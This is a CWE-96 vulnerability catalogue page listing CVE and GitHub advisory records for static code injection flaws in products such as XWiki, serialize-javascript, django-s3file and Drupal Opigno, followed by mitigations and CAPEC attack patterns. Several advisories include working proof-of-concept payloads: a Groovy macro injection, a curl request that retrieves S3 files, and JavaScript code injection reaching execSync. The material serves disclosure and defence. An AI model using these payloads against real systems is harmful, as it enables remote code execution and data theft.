CWE-96
AllowedImproper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
Abstraction: Base · Status: Draft
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before inserting the input into an executable resource, such as a library, configuration file, or template.
43 vulnerabilities reference this CWE, most recent first.
CVE-2015-2079 (GCVE-0-2015-2079)
Vulnerability from cvelistv5 – Published: 2025-04-28 00:00 – Updated: 2025-04-28 15:26- CWE-96 - Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection')
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2015-2079",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-28T15:17:22.192383Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-28T15:26:11.894Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Usermin",
"vendor": "Usermin",
"versions": [
{
"lessThan": "1.660",
"status": "affected",
"version": "0.980",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:usermin:usermin:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.660",
"versionStartIncluding": "0.980",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Usermin 0.980 through 1.x before 1.660 allows uconfig_save.cgi sig_file_free remote code execution because it uses the two argument (not three argument) form of Perl open."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-96",
"description": "CWE-96 Improper Neutralization of Directives in Statically Saved Code (\u0027Static Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-28T14:45:13.615Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://code-white.com/public-vulnerability-list/"
},
{
"url": "https://code-white.com/blog/2015-05-cve-2015-2079-rce-usermin/"
}
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2015-2079",
"datePublished": "2025-04-28T00:00:00.000Z",
"dateReserved": "2015-02-24T00:00:00.000Z",
"dateUpdated": "2025-04-28T15:26:11.894Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-2R87-74CX-2P7C
Vulnerability from github – Published: 2024-12-12 19:21 – Updated: 2024-12-12 22:33Impact
Any user with an account can perform arbitrary remote code execution by adding instances of XWiki.WikiMacroClass to any page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.
To reproduce on a instance, as a connected user without script nor programming rights, go to your user profile and add an object of type XWiki.WikiMacroClass. Set "Macro Id", "Macro Name" and "Macro Code" to any value, "Macro Visibility" to Current User and "Macro Description" to {{async}}{{groovy}}println("Hello from User macro!"){{/groovy}}{{/async}}.
Save the page, then go to <host>/xwiki/bin/view/XWiki/XWikiSyntaxMacrosList.
If the description of your new macro reads "Hello from User macro!", then your instance is vulnerable.
Patches
This vulnerability has been fixed in XWiki 15.10.11, 16.4.1 and 16.5.0.
Workarounds
It is possible to manually apply this patch to the page XWiki.XWikiSyntaxMacrosList.
References
- https://jira.xwiki.org/browse/XWIKI-22030
- https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-help-ui"
},
"ranges": [
{
"events": [
{
"introduced": "9.7-rc-1"
},
{
"fixed": "15.10.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-help-ui"
},
"ranges": [
{
"events": [
{
"introduced": "16.0.0-rc-1"
},
{
"fixed": "16.4.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-help-ui"
},
"ranges": [
{
"events": [
{
"introduced": "16.5.0-rc-1"
},
{
"fixed": "16.5.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-55877"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-96"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-12T19:21:06Z",
"nvd_published_at": "2024-12-12T20:15:21Z",
"severity": "CRITICAL"
},
"details": "### Impact\nAny user with an account can perform arbitrary remote code execution by adding instances of `XWiki.WikiMacroClass` to any page. This compromises the confidentiality, integrity and availability of the whole XWiki installation.\n\nTo reproduce on a instance, as a connected user without script nor programming rights, go to your user profile and add an object of type `XWiki.WikiMacroClass`. Set \"Macro Id\", \"Macro Name\" and \"Macro Code\" to any value, \"Macro Visibility\" to `Current User` and \"Macro Description\" to `{{async}}{{groovy}}println(\"Hello from User macro!\"){{/groovy}}{{/async}}`.\nSave the page, then go to `\u003chost\u003e/xwiki/bin/view/XWiki/XWikiSyntaxMacrosList`.\nIf the description of your new macro reads \"Hello from User macro!\", then your instance is vulnerable.\n\n### Patches\nThis vulnerability has been fixed in XWiki 15.10.11, 16.4.1 and 16.5.0.\n\n### Workarounds\nIt is possible to manually apply [this patch](https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3#diff-92fee29683e671b8bc668e3cf4295713d6259f715e3954876049f9de77c0a9ef) to the page `XWiki.XWikiSyntaxMacrosList`.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-22030\n* https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3",
"id": "GHSA-2r87-74cx-2p7c",
"modified": "2024-12-12T22:33:07Z",
"published": "2024-12-12T19:21:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2r87-74cx-2p7c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55877"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/40e1afe001d61eafdf13f3621b4b597a0e58a3e3"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-22030"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki allows remote code execution from account through macro descriptions and XWiki.XWikiSyntaxMacrosList"
}
GHSA-2RX4-VRV5-3MJP
Vulnerability from github – Published: 2025-01-09 21:31 – Updated: 2025-01-14 18:31Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno Learning path allows PHP Local File Inclusion.This issue affects Opigno Learning path: from 0.0.0 before 3.1.2.
{
"affected": [],
"aliases": [
"CVE-2024-13265"
],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-09T20:15:35Z",
"severity": "HIGH"
},
"details": "Improper Neutralization of Directives in Statically Saved Code (\u0027Static Code Injection\u0027) vulnerability in Drupal Opigno Learning path allows PHP Local File Inclusion.This issue affects Opigno Learning path: from 0.0.0 before 3.1.2.",
"id": "GHSA-2rx4-vrv5-3mjp",
"modified": "2025-01-14T18:31:55Z",
"published": "2025-01-09T21:31:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13265"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2024-029"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3V9P-VGM5-CGM3
Vulnerability from github – Published: 2026-02-11 15:30 – Updated: 2026-02-12 21:31An improper neutralization of directives in statically saved code ('Static Code Injection') vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to access restricted data / files.
We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5166 and later
{
"affected": [],
"aliases": [
"CVE-2025-57707"
],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T13:15:55Z",
"severity": "LOW"
},
"details": "An improper neutralization of directives in statically saved code (\u0027Static Code Injection\u0027) vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to access restricted data / files.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later",
"id": "GHSA-3v9p-vgm5-cgm3",
"modified": "2026-02-12T21:31:25Z",
"published": "2026-02-11T15:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57707"
},
{
"type": "WEB",
"url": "https://www.qnap.com/en/security-advisory/qsa-26-03"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-4W8F-HJM9-XWGF
Vulnerability from github – Published: 2022-06-06 21:24 – Updated: 2024-09-16 21:49Impact
It was possible to traverse the entire AWS S3 bucket and in most cases to access or delete files. The issue was discovered by the maintainer. There were no reports of the vulnerability being known to or exploited by a third party, before the release of the patch.
If the AWS_LOCATION setting was set, traversal was limited to that location only.
If all your files handling views (like form views) require authentication or special permission, the thread is limited to privileged users.
Patches
The vulnerability has been fixed in version 5.5.1 and above.
Workarounds
There is no feasible workaround. We must urge all users to immediately updated to a patched version.
Detailed attack vector description
An attacker may use a request with malicious form data to traverse the entire AWS S3 bucket and perform destructive operations.
An attack could look as follows:
curl -X POST -F "s3file=file" -F "file=/priviliged/location/secrets.txt" https://www.example.com/any/path/will/work/
This will result in a request with files set and opened:
>>> request.FILES.getlist("file")
[File("/priviliged/location/secrets.txt")]
Since this behavior is injected via a middleware, any view can be called this way and will carry any files defined by the attacker.
Via the s3file form field, any input name can be specified, including multiple inputs. For each input, multiple files can be freely
picked of the S3 bucket.
Scenarios and their practicality
There are four scenarios that would be considered practical in most setups:
- Illegal file injection,
- file deletion,
- file retrieval & tree traversal.
- code injection & remote code execution.
File deletion
An attacker knows the location of a privileged file, like a static asset. Next, the file is injected into a form view. The upload to function will move the file to a new location. This is effectively deleting the file, since the previous references to it are invalid, and will cause S3 to return a 404. Furthermore, the new location is unknown to the site operator.
File retrieval & tree traversal
An attacker knows the URL of a secret file and injects it into a form view. The view will move the file to a public location, making it accessible to the attacker. Since most form views will not be rate limited, this could also be used to guess files and traverse the file tree.
Illegal file injection
An attacker uses any form to upload a file to the temporary upload location. Next, the attacker injects that file into a request, does not validate the contents or is not equipped to handle the mime type. The latter could be used as a potential DOS vector.
In practice, this is not a practical risk in most hardened setup. Files should always be sanitized before processing, since files can be included in a request even without this security issues.
For more information
If you have any questions or comments about this advisory: * Open an issue on GitHub * Email us at johannes@maron.family
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "django-s3file"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.5.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-24840"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-96"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-06T21:24:24Z",
"nvd_published_at": "2022-06-09T04:15:00Z",
"severity": "CRITICAL"
},
"details": "### Impact\n\nIt was possible to traverse the entire AWS S3 bucket and in most cases to access or delete files.\nThe issue was discovered by the maintainer. There were no reports of the vulnerability\nbeing known to or exploited by a third party, before the release of the patch.\n\nIf the `AWS_LOCATION` setting was set, traversal was limited to that location only.\nIf all your files handling views (like form views) require authentication or special permission, the thread is limited to privileged users.\n\n### Patches\n\nThe vulnerability has been fixed in version 5.5.1 and above.\n\n### Workarounds\n\nThere is no feasible workaround. We must urge all users to immediately updated to a patched version.\n\n### Detailed attack vector description\n\nAn attacker may use a request with malicious form data to traverse the entire AWS S3 bucket and perform destructive operations.\n\nAn attack could look as follows:\n```bash\ncurl -X POST -F \"s3file=file\" -F \"file=/priviliged/location/secrets.txt\" https://www.example.com/any/path/will/work/\n```\n\nThis will result in a request with files set and opened:\n\n```python\n\u003e\u003e\u003e request.FILES.getlist(\"file\")\n[File(\"/priviliged/location/secrets.txt\")]\n```\n\nSince this behavior is injected via a middleware, any view can be called this way and will carry any files defined by the attacker.\n\nVia the `s3file` form field, any input name can be specified, including multiple inputs. For each input, multiple files can be freely\npicked of the S3 bucket.\n\n#### Scenarios and their practicality\n\nThere are four scenarios that would be considered practical in most setups:\n\n1. Illegal file injection,\n2. file deletion,\n3. file retrieval \u0026 tree traversal.\n4. code injection \u0026 remote code execution.\n\n##### File deletion\n\nAn attacker knows the location of a privileged file, like a static asset. Next, the file is injected into a form view. The upload to function will move the file to a new location. This is effectively deleting the file, since the previous references to it are invalid, and will cause S3 to return a 404. Furthermore, the new location is unknown to the site operator.\n\n##### File retrieval \u0026 tree traversal\n\nAn attacker knows the URL of a secret file and injects it into a form view. The view will move the file to a public location, making it accessible to the attacker. Since most form views will not be rate limited, this could also be used to guess files and traverse the file tree.\n\n##### Illegal file injection\n\nAn attacker uses any form to upload a file to the temporary upload location. Next, the attacker injects that file into a request, does not validate the contents or is not equipped to handle the mime type. The latter could be used as a potential DOS vector.\n\nIn practice, this is not a practical risk in most hardened setup. Files should always be sanitized before processing, since files can be included in a request even without this security issues.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue on [GitHub](https://github.com/codingjoe/django-s3file/issues)\n* Email us at [johannes@maron.family](mailto:johannes@maron.family)\n",
"id": "GHSA-4w8f-hjm9-xwgf",
"modified": "2024-09-16T21:49:30Z",
"published": "2022-06-06T21:24:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/codingjoe/django-s3file/security/advisories/GHSA-4w8f-hjm9-xwgf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24840"
},
{
"type": "WEB",
"url": "https://github.com/codingjoe/django-s3file/commit/68ccd2c621a40eb66fdd6af2be9d5fcc9c373318"
},
{
"type": "PACKAGE",
"url": "https://github.com/codingjoe/django-s3file"
},
{
"type": "WEB",
"url": "https://github.com/codingjoe/django-s3file/releases/tag/5.5.1"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/django-s3file/PYSEC-2022-208.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Path Traversal in django-s3file"
}
GHSA-5C6J-R48X-RMVQ
Vulnerability from github – Published: 2026-02-28 02:50 – Updated: 2026-03-02 16:17Impact
The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.
While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().
If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
#h2. PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
#h2. PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
Patches
The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.0.2"
},
"package": {
"ecosystem": "npm",
"name": "serialize-javascript"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-28T02:50:45Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nThe serialize-javascript npm package (versions \u003c= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `\u003cscript\u003e` tags), the injected code executes.\n\n```javascript\nconst serialize = require(\u0027serialize-javascript\u0027);\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, \u0027source\u0027, { get: () =\u003e \u0027x\u0027 });\nObject.defineProperty(fakeRegex, \u0027flags\u0027, {\n get: () =\u003e \u0027\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\u0027\n});\nfakeRegex.toJSON = function() { return \u0027@placeholder\u0027; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval(\u0027obj = \u0027 + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require(\u0027serialize-javascript\u0027);\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return \u0027\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\u0027; };\nfakeDate.toJSON = function() { return \u00272024-01-01\u0027; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval(\u0027obj = \u0027 + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require(\u0027serialize-javascript\u0027);\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, \u0027source\u0027, { get: () =\u003e \u0027x\u0027 });\nObject.defineProperty(rceRegex, \u0027flags\u0027, {\n get: () =\u003e \u0027\"+require(\"child_process\").execSync(\"id\").toString()+\"\u0027\n});\nrceRegex.toJSON = function() { return \u0027@rce\u0027; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval\u0027d on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"id": "GHSA-5c6j-r48x-rmvq",
"modified": "2026-03-02T16:17:35Z",
"published": "2026-02-28T02:50:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
},
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-hxcc-f52p-wc94"
},
{
"type": "PACKAGE",
"url": "https://github.com/yahoo/serialize-javascript"
},
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()"
}
GHSA-6J67-4CMX-RGW8
Vulnerability from github – Published: 2025-01-09 21:31 – Updated: 2025-01-11 00:32Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno group manager allows PHP Local File Inclusion.This issue affects Opigno group manager: from 0.0.0 before 3.1.1.
{
"affected": [],
"aliases": [
"CVE-2024-13263"
],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-09T20:15:35Z",
"severity": "MODERATE"
},
"details": "Improper Neutralization of Directives in Statically Saved Code (\u0027Static Code Injection\u0027) vulnerability in Drupal Opigno group manager allows PHP Local File Inclusion.This issue affects Opigno group manager: from 0.0.0 before 3.1.1.",
"id": "GHSA-6j67-4cmx-rgw8",
"modified": "2025-01-11T00:32:04Z",
"published": "2025-01-09T21:31:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13263"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2024-027"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-7886-36J3-HR33
Vulnerability from github – Published: 2025-06-27 15:31 – Updated: 2025-06-27 15:31Dell Unisphere for PowerMax vApp, version(s) 9.2.4.x, contain(s) an Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.
{
"affected": [],
"aliases": [
"CVE-2025-36595"
],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-06-27T14:15:36Z",
"severity": "HIGH"
},
"details": "Dell Unisphere for PowerMax vApp, version(s) 9.2.4.x, contain(s) an Improper Neutralization of Directives in Statically Saved Code (\u0027Static Code Injection\u0027) vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.",
"id": "GHSA-7886-36j3-hr33",
"modified": "2025-06-27T15:31:24Z",
"published": "2025-06-27T15:31:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36595"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000337554/dsa-2025-235-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-and-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilit"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-82P4-M5CC-J7C9
Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-05-24 19:12Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with "Jira Administrators" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.
{
"affected": [],
"aliases": [
"CVE-2021-39115"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-01T23:15:00Z",
"severity": "HIGH"
},
"details": "Affected versions of Atlassian Jira Service Management Server and Data Center allow remote attackers with \"Jira Administrators\" access to execute arbitrary Java code or run arbitrary system commands via a Server_Side Template Injection vulnerability in the Email Template feature. The affected versions are before version 4.13.9, and from version 4.14.0 before 4.18.0.",
"id": "GHSA-82p4-m5cc-j7c9",
"modified": "2022-05-24T19:12:56Z",
"published": "2022-05-24T19:12:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39115"
},
{
"type": "WEB",
"url": "https://jira.atlassian.com/browse/JSDSERVER-8665"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-99H6-9PR2-5G94
Vulnerability from github – Published: 2025-01-09 21:31 – Updated: 2025-01-10 18:31Improper Neutralization of Directives in Statically Saved Code ('Static Code Injection') vulnerability in Drupal Opigno module allows PHP Local File Inclusion.This issue affects Opigno module: from 0.0.0 before 3.1.2.
{
"affected": [],
"aliases": [
"CVE-2024-13264"
],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-09T20:15:35Z",
"severity": "CRITICAL"
},
"details": "Improper Neutralization of Directives in Statically Saved Code (\u0027Static Code Injection\u0027) vulnerability in Drupal Opigno module allows PHP Local File Inclusion.This issue affects Opigno module: from 0.0.0 before 3.1.2.",
"id": "GHSA-99h6-9pr2-5g94",
"modified": "2025-01-10T18:31:39Z",
"published": "2025-01-09T21:31:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13264"
},
{
"type": "WEB",
"url": "https://www.drupal.org/sa-contrib-2024-028"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
Strategy: Output Encoding
Perform proper output validation and escaping to neutralize all code syntax from data written to code files.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
CAPEC-81: Web Server Logs Tampering
